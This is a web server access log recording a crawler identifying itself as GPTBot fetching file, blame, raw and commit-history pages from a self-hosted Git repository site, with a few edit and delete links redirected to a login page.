74.7.227.38] [Length 12149] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:29:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 10429] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3" -[17/Feb/2026:15:29:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 9991] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3.12" -[17/Feb/2026:15:29:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/httpx" [Client 74.7.227.38] [Length 248] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/httpx" -[17/Feb/2026:15:29:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 16] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3" -[17/Feb/2026:15:29:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 11529] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:29:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip" -[17/Feb/2026:15:29:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 11560] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:29:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 11060] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:29:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 7] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python" -[17/Feb/2026:15:29:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 19884] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:29:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 11431] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.csh" -[17/Feb/2026:15:29:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.csh" -[17/Feb/2026:15:29:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 16] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3" -[17/Feb/2026:15:29:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 22025] [Gzip 6.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/js" -[17/Feb/2026:15:29:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 10421] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3" -[17/Feb/2026:15:29:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/dotenv" -[17/Feb/2026:15:29:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 10413] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/dotenv" -[17/Feb/2026:15:29:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3" -[17/Feb/2026:15:29:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 7] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python" -[17/Feb/2026:15:29:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python" -[17/Feb/2026:15:29:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 9980] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python" -[17/Feb/2026:15:29:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 9033] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/Activate.ps1" -[17/Feb/2026:15:29:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 256] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/dotenv" -[17/Feb/2026:15:29:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 22426] [Gzip 11.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/Activate.ps1" -[17/Feb/2026:15:29:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:15:29:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 25194] [Gzip 12.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:15:29:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 11073] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:15:29:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 10422] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3" -[17/Feb/2026:15:29:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3" -[17/Feb/2026:15:29:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 11070] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:29:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 27366] [Gzip 7.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js" -[17/Feb/2026:15:29:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 2221] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.fish" -[17/Feb/2026:15:29:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 18909] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build" -[17/Feb/2026:15:29:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" [Client 74.7.227.38] [Length 11927] [Gzip 4.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" -[17/Feb/2026:15:29:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/README.md" [Client 74.7.227.38] [Length 11528] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html" -[17/Feb/2026:15:29:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 10870] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.tsx" -[17/Feb/2026:15:29:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/GoldMonitor/ReadMe.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" -[17/Feb/2026:15:29:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/GoldMonitor/ReadMe.md" -[17/Feb/2026:15:29:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11605] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:29:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11602] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:29:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11604] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:29:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 9990] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3" -[17/Feb/2026:15:29:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 10139] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:15:29:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3" -[17/Feb/2026:15:29:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 20674] [Gzip 14.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:29:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:29:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 36887] [Gzip 12.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:15:29:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/README.md" -[17/Feb/2026:15:29:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/README.md" -[17/Feb/2026:15:29:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/README.md" -[17/Feb/2026:15:29:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] 